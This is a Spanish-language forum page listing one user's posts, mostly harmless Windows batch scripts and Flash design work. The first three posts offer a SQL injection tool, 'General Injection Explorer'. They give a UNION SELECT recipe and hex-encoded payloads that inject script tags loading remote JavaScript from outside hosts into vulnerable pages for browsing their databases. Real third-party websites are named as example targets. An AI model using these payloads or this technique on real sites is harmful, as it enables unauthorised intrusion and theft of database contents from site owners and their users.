Últimos Temas de: Pony-Magic

Mostrar Temas
Páginas: [1]

1	Seguridad Informática / Nivel Web / GiE 4.8 - SQLi	en: 13 Diciembre 2010, 09:26 am
General Injection Explorer 4.8 version anterior. ajax peticiones con async dumpea tablas en <table> y .SQL full path disclosure write file Paste2 Codigo de fuente. Archivo Gie.JS Código: ((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e)) -> usar ((0xCode)) en vez de (0xCode) @name: General Injection Explorer @version: 4.8 @author: PonyMagic @date: 12/12/2010 - 2:51 @contact: PonyMagic@live.com PD: si ni sabes como funciona, abajo del titulo podes ver el post de la versión anterior.[/b]

2	Seguridad Informática / Nivel Web / GiE 4.7 - MySQLi	en: 16 Marzo 2010, 19:02 pm
GiE 4.7 No voy a escribir una descripción de que es la GiE, las nuevas características, etc, etc. Simplemente voy a dejar el link de la VERSION 3.0 para el que quiera saber "que es". De esta nueva version solo voy a poner algunos screens, links con ejemplos, el código de fuente y el código para insertarlo en cualquier SQLi. Screens: explorador de bases de datos. lector de archivos, con Bruteforce. consola de peticiones, en la imagen un ejemplo de una query que busca mails en la base de datos. variables del servidor Historial de Inyecciones, para el que quiera saber un poco mas sobre el funcionamiento de la GIE Ejemplos: SQLi GIE [adegasgalegas.es] SQLi GIE [rubias19.com] SQLi GIE [comic-ar.com] Usarlo en cualqueir SQLi: En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 ) En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE. Código: (0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e) Codigo de fuente Codigo de fuente Paste2 Highlight

3	Seguridad Informática / Nivel Web / MySQLi \| General Inejction Explorer \| By PonyMagic	en: 13 Diciembre 2009, 00:28 am
General Injection Explorer 3.0 by PonyMagic [?] Que es? Basicamente es un explorador de bases de datos MySQL via SQLi, "incrustado" en la inyeccion. [!] Que tiene la version 3.0? Codeado desde 0. Bypasseo de "illegal operation", y limite de group_concat_max_len. Mejor manejo de CSS && DIVS. Peticiones realizadas con AJAX. Nueva forma de ver tablas, MUCHO mas ordenadas. [?] Como se usa? En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 ) En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE. Código: (0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e) Ejemplo: adegasgalegas.es SQLi adegasgalegas.es GIE SQLi Injeccion con General Injection Explorer 3.0 Luego, se navegan las bases de datos, usando ese "cuadradito" como un mini-phpmyadmin como se ve en el siguiente [.gif]: Gracias a virtux por hostear, acá tienen el código y el link: Link JS Link Paste2 [Highlight]

4	Media / Diseño Gráfico / Mi TUX [FLASH CS3]	en: 27 Junio 2009, 06:00 am
Bueno, estaba asi mirando cosas y veo que siempre usan el Tux... y tambien que siempre es algun PNG de internet ... asi que me decidi a dibujar uno Lo hize en Flash CS3, cosa de que sea vectoral y me quede entre mis Archivitos, por si algun dia necesito algun Tux para mis animaciones En vez de traerles el Screen, me parecio bien grabarlo mientras lo ago... me tomo 15min ( el video, esta acelerado, dura 2min ), tampoco quedo muy lindo, pero nunca ago esas cosas asi que me fue bastante mejor de lo que esperaba

Programación / Scripting / [+] MenuCreator

en: 28 Mayo 2009, 04:19 am

Con MenuCreator pueden crear un menu desde un simple Call...

Parametros:

Código:

Call:Menu
         |_1_ Items separados por Puntos ( ejemplo.de.items. )
         |_2_ Espacio entre borde Isq y menu ( "                  " )
         |_3_ Icono de NO seleccionado ( "[-]" )
         |_4_ Icono de SI seleccionado ( "[+]" )
         |_5_ Variable que contenga una cabezera para el menu, sin %% (Cabezera)
         |_6_  Variable donde se almacenara el item seleccionado

[i]Call:Menu "ejemplo.de.items" "                  " "[-]" "[+]" Cabezera Resultado[/i]

( Lo pongo entre (Code)(/Code) porque sino se deforma... )

Ejemplos:

Codigo:

Código:

:MenuCreator
SetLocal EnableDelayedExpansion
If NOT exist "keyboard.exe" (Call:..kybrd Echo)
Set ..p6=%6
Set ..c=0
set ..p1=%~1
set ..p1=%..p1:.=,%
For  %%_ in (%..p1%) Do (Set /A ..c+=1&Set ..itm!..c!=%%_)
Set ..s=1
:..MnGn
CLS&Echo.&!%5!&Echo.
For /L %%_ in (1,1,!..c!) Do (
	If ["%%_"]==["!..s!"] (Echo%~2%~4 !..itm%%_!) Else (Echo%~2%~3 !..itm%%_!)
)
keyboard
If ["%ErrorLevel%"]==["72"] (IF not ["!..s!"]==["1"] (Set /A ..s-=1))
If ["%ErrorLevel%"]==["80"] (IF not ["!..s!"]==["!..c!"] (Set /A ..s+=1))
If ["%ErrorLevel%"]==["13"] (Set %..p6%=!..itm%..s%!&CLS&GOTO:EOF)
GoTo:..MnGn
:..kybrd
(%1 n keyboard.dat
%1 e 0000 4D 5A 2E 00 01 00 00 00 02 00 00 10 FF FF F0 FF
%1 e 0010 FE FF 00 00 00 01 F0 FF 1C 00 00 00 00 00 00 00
%1 e 0020 B4 08 CD 21 3C 00 75 02 CD 21 B4 4C CD 21
%1 rcx&%1 002E&%1 w0&%1 q&%1.)>keyboard.dat
type keyboard.dat|debug>NUL 2>&1
del /f/q/a "keyboard.exe">NUL 2>&1
rename "keyboard.dat" "keyboard.exe"
GoTo:EOF

Código:

Set Cabezera=Echo                            \_/\ [ MenuByPony ] /\_/
Call:Menu "Menu.By.Pony.Magic" "                            " "[-]" " [+]" Cabezera resultado
Echo.
Echo %resultado%
Pause

Código:

Set Cabezera=Echo                     -:01010011.. P0NYM4GIK ..11001010:-
Call:Menu "Menu.By.Pony.Magic" "                         " "o" " o" Cabezera resultado
Echo.
Echo %resultado%
Pause

Programación / Scripting / MapGame 2.0 .: By PonyMagic :.

en: 31 Marzo 2009, 17:32 pm

- Para ver el MapGame 1.0 Click Aqui.

.:] MapGame [:.

Mini-Motor de juegos Batch

- Mejoras de la version anterior:

|-| Todas las variables empiezan con "." (Punto) de esta manera no se mezcla con las variables que uno este usado.
|-| La forma de generar el mapa, es mas rapida, los objetos solidos, salidas, etc. son nombrados 1 sola vez, lo unico que cambia es la posicion del personaje.
|-| El Codigo es mas limpio, no hay variables sin usar o cosas así.

- Como llamarlo? :

|-| Solid/ + Coordenadas solidas separadas por "." (Punto).
|-| Exist/ + Coordenadas de salidas separadas por "." (Punto).
|-| PJ/ + Coordenada del persojane.
|-| Map/ + Valor1 + "x" + Valor2

- Ejemplo:
Call:MapGAME Solid/y2x2.y3x2.y4x2 Exit/y6x2.y6x3 PJ/y4x4 Map/8x12

|-| CODIGO

Código:

:MapGAME
:: By PonyMagic
SetLocal EnableDelayedExpansion
For /F "Tokens=2 Delims=/" %%f in ("%1") Do (Set .Sld=%%f&Set .Sld=!.Sld:.=,!)
For /F "Tokens=2 Delims=/" %%f in ("%2") Do (Set .Ext=%%f&Set .Ext=!.Ext:.=,!)
For /F "Tokens=2 Delims=y" %%f in ("%3") Do (Set .PJy=%%f)
For /F "Tokens=2 Delims=x" %%f in ("%.PJy%") Do (Set .PJx=%%f)
For /F "Tokens=1 Delims=x" %%f in ("%.PJy%") Do (Set .PJy=%%f)
For /F "Tokens=2 Delims=/" %%f in ("%3") Do (Set .PJ=%%f)
For /F "Tokens=2 Delims=/" %%f in ("%4") Do (Set .Map=%%f)
For /F "Tokens=1 Delims=x" %%f in ("%.Map%") Do (Set .LmY=%%f)
For /F "Tokens=2 Delims=x" %%f in ("%.Map%") Do (Set .LmX=%%f)
For %%e in (%.Sld%) do (set %%e=Û)
For %%e in (%.Ext%) do (set %%e=)
Set %.PJ%=
For /L %%Y in (1,1,%.LmY%) Do (
	For /L %%X in (1,1,%.LmX%) Do (
		Set ln.%%Y=!ln.%%Y!!y%%Yx%%X!
	)
	Echo !ln.%%Y!
)
GoTo:Choice_
:MG_
Set %1=
For /L %%Y in (%2) Do (For /L %%X in (%3) Do (Set ln.%%Y=!ln.%%Y!!y%%Yx%%X!))
For /L %%S in (1,1,%.LmY%) Do (Echo !ln.%%S!)
:Choice_
CHOICE.EXE /c ADSW /n >nul
Set NwPs=
If ["%ErrorLevel%"]==["1"] (
	Set /a .Nw=%.PJx%-1
	For %%e in (%.Sld%) do (If ["%%e"]==["y%.PJy%x%.Nw%"] Set NwPs=y%.PJy%x%.PJx%)
	For %%e in (%.Ext%) do (If ["%%e"]==["y%.PJy%x%.Nw%"] GoTo:EoF)
	If NOT Defined NwPs (Set NwPs=y%.PJy%x%.Nw%)
	Set /a .PJx=%.PJx%-1
	Call:MG_ %NwPs% %.PJy% %.PJx%
)
If ["%ErrorLevel%"]==["2"] (
	Set /a .Nw=%.PJx%+1
	For %%e in (%.Sld%) do (If ["%%e"]==["y%.PJy%x%.Nw%"] Set NwPs=y%.PJy%x%.PJx%)
	For %%e in (%.Ext%) do (If ["%%e"]==["y%.PJy%x%.Nw%"] GoTo:EoF)
	If NOT Defined NwPs (Set NwPs=y%.PJy%x%.Nw%)
	Set /a .PJx=%.PJx%+1
	Call:MG_ %NwPs% %.PJy% %.PJx%
)
If ["%ErrorLevel%"]==["3"] (
	Set /a .Nw=%.PJy%+1
	For %%e in (%.Sld%) do (If ["%%e"]==["y%.Nw%x%.PJx%"] Set NwPs=y%.PJy%x%.PJx%)
	For %%e in (%.Ext%) do (If ["%%e"]==["y%.Nw%x%.PJx%"] GoTo:EoF)
	If NOT Defined NwPs (Set NwPs=y%.Nw%x%.PJx%)
	Set /a .PJy=%.PJy%+1
	Call:MG_ %NwPs% %.PJy% %.PJx%
)
If ["%ErrorLevel%"]==["1"] (
	Set /a .Nw=%.PJy%-1
	For %%e in (%.Sld%) do (If ["%%e"]==["y%.Nw%x%.PJx%"] Set NwPs=y%.PJy%x%.PJx%)
	For %%e in (%.Ext%) do (If ["%%e"]==["y%.Nw%x%.PJx%"] GoTo:EoF)
	If NOT Defined NwPs (Set NwPs=y%.Nw%x%.PJx%)
	Set /a .PJy=%.PJy%-1
	Call:MG_ %NwPs% %.PJy% %.PJx%
)
GoTo:EOF

- DESCARGAR EJEMPLO + CHOICE.EXE -

http://www.mediafire.com/?wngcbomhsjg

- PonyMagic

Programación / Scripting / MapGame - "Motor" de juegos batch.

en: 26 Marzo 2009, 06:56 am

- MapGame 1.0 By PonyMagic
Motor para crear mapas de juegos de diferentes tamaños donde un personaje se mueve, hay salidas, y objetos solidos que el jugador no puede atravezar. ;-)

Ejemplo:
Call:mapGame solid=y2x1-y2x2-y2x3-y2x4-y2x5 pj=y3x2 map=5x10 exitmap=y3x1-y3x2

Solid=Coordenadas de objetos solidos. ( separados por - )
PJ= Coordenada de inicio del jugador.
Map=Tamaño del mapa ( 5x10, 5 renglones, 10x por renglon )
exitmap=Coordenadas de salida del mapa. ( separados por - )

Código:

:mapGame
CLS
SetLocal EnableDelayEdexpansion
set prm_1=%1&set prm_2=%2
set prm_3=%3&set prm_all=%*
set prm_5=%5&set prm_6=%6
set prm_7=%7&set prm_8=%8
set sld=%2
set sld=%sld:-=,%
set ext=%8
set ext=%ext:-=,%
For /F "Tokens=1 delims=x" %%z in ("%6") Do (set LmtY=%%z)
For /F "Tokens=2 delims=x" %%z in ("%6") Do (set LmtX=%%z)
For /L %%Y in (1,1,%LmtY%) do (Set Lin_%%Y=)
For /L %%Y in (1,1,%LmtY%) do (
	For /L %%X in (1,1,%LmtX%) do (
		Set y%%Yx%%X=±
		For %%S in (%sld%) Do (
			set %%S=Û
		)
		set %4=
		For %%P in (%ext%) do (
			If ["%4"]==["%%P"] ( GoTo:EOF ) ELSE (Set %%P=)
		)
		Set Lin_%%Y=!Lin_%%Y!!y%%Yx%%X!
	)
Echo !Lin_%%Y!
)
CHOICE.EXE /c ADSW /n >nul
For /F "Tokens=* delims=y" %%F in ("%4") do (
	For /F "Tokens=1 delims=x" %%G in ("%%F") do (
	set PosY=%%G
	)
	For /F "Tokens=2 delims=x" %%G in ("%%F") do (
	set PosX=%%G
	)
)
If %Errorlevel%==1 ( if not !PosX!==1 (
set /a PosX-=1
set NwPJ=y%PosY%x!PosX!
	For %%S in (%sld%) Do (
		If "%%S"=="!NwPJ!" (
		 Call:mapGame %prm_all%
		)
	)

Call:mapGame %prm_1%=%prm_2% %prm_3%=!NwPJ! %prm_5%=%prm_6% %prm_7%=%prm_8%))
If %Errorlevel%==2 ( if not !PosX!==%LmtX% (
set /a PosX+=1
set NwPJ=y%PosY%x!PosX!
	For %%S in (%sld%) Do (
		If "%%S"=="!NwPJ!" (
		 Call:mapGame %prm_all%
		)
	)

Call:mapGame %prm_1%=%prm_2% %prm_3%=!NwPJ! %prm_5%=%prm_6% %prm_7%=%prm_8%))
If %Errorlevel%==3 ( if not !PosY!==%LmtY% (
set /a PosY+=1
set NwPJ=y!PosY!x%PosX%
	For %%S in (%sld%) Do (
		If "%%S"=="!NwPJ!" (
		 Call:mapGame %prm_all%
		)
	)

Call:mapGame %prm_1%=%prm_2% %prm_3%=!NwPJ! %prm_5%=%prm_6% %prm_7%=%prm_8%))
If %Errorlevel%==4 ( if not !PosY!==1 (
set /a PosY-=1
set NwPJ=y!PosY!x%PosX%
	For %%S in (%sld%) Do (
		If "%%S"=="!NwPJ!" (
		 Call:mapGame %prm_all%
		)
	)

Call:mapGame %prm_1%=%prm_2% %prm_3%=!NwPJ! %prm_5%=%prm_6% %prm_7%=%prm_8%))
Goto:EOF

EJEMPLO:

Código:

set Pje=y3x2
:_
Call:mapGame solid=y3x1-y2x1-y2x2-y2x3-y2x4-y2x5-y2x6-y2x7-y2x8-y2x9-y2x10-y4x1-y4x2-y4x3-y4x4-y4x5-y4x6-y4x7-y4x8-y4x9-y4x10 pj=%Pje% map=5x10 exitmap=y3x10
Call:mapGame solid=y2x1-y2x2-y2x3-y2x4-y2x5-y2x6-y2x7-y2x8-y2x9-y2x10-y4x1-y4x2-y4x3-y4x4-y4x5-y4x6-y4x7-y4x8-y4x9-y4x10-y3x10 pj=y3x2 map=5x10 exitmap=y3x1
set Pje=y3x9
GoTo:_

CHOICE.EXE - Click para Descargar

http://rapidshare.com/files/214215002/CHOICE.EXE.html

8	Programación / Scripting / Saber si un proceso esta abierto.	en: 31 Diciembre 2008, 03:00 am
Bueno, vi un code que usaba errorlevel para saber si un proceso esta abierto o no. yo siempre use esto: Código: :Task for /f "Tokens=1" %%p in ('tasklist') do ( if "%%p"=="%1" ( set %2=Si & GoTo:Eof ) else ( set %2=No)) & GoTo:Eof ( Call:Task Proceso.exe variable ) Pero me gustaria saber como es con %errorlevle%, si alguien me lo explica, porque la otra vez no lo entendi.

9	Media / Diseño Gráfico / Efecto web 2.0 en Flash	en: 17 Diciembre 2008, 20:42 pm
Bueno, aca ise un videito de un efecto web 2.0 en flash para texto. El elfecto quedaria algo asi: Aca el video en youtube: Descarga Directa del .Fla ( Editable. ) [Adrive.com] : http://www.adrive.com/public/2ae9222db813803fc3943e027dd54a9db7facb7a2558532a80faae71d81341b4.html Descarga Directa del .avi ( Video en mejor definicion. ) [Adrive.com] : http://www.adrive.com/public/c0b160eeb4439f0bd73ceba7e5064bf8e6bf4a4a8825b48f4bb1dbecdd547af9.html Atte Pony-Magic

10	Programación / Scripting / codigo para pausar batch	en: 16 Diciembre 2008, 23:08 pm
Este es un codigo que cree para dejar pasar un tiempo en batch. muchos usan: ping -n 1 localHost >nul Pero con este codigo pueden dejar una cantidad de segundos exactos que seran contados mediante el codigo en un bucle con la variable %time%. lo copian en su codigo y con un call:time Numero ya lo tienen. ( por ejemplo: call:time 5 ) bueno, es mi 1er post aca, asi que no critiquen mucho Código: @echo off :time :: By PonyMagic set r=%tmp%\time.txt set x=0 if '%1==' ( Echo No hay numero. & GoTo:Eof ) if %1 leq 0 ( Echo el numero es 0 o negativo. & GoTo:Eof ) set cnt=%1 :_ echo %time% > %r% for /f "tokens=3 delims=:" %%x in (%r%) do (set x1=%%x) set x2=%x1:~0,2% if "%x2%"=="%x3%" ( GoTo _ ) set x3=%x2% set /a cnt=%cnt%-1 if "%cnt%"=="0" ( del /f /q %r% & GoTo:Eof ) GoTo _ Atte Pony-Magic Edito: Edite el codigo, gracias _carlos_ por decirme del error Edito: Edite el codigo, gracias _carlos_ por decirme del otro error

Páginas: [1]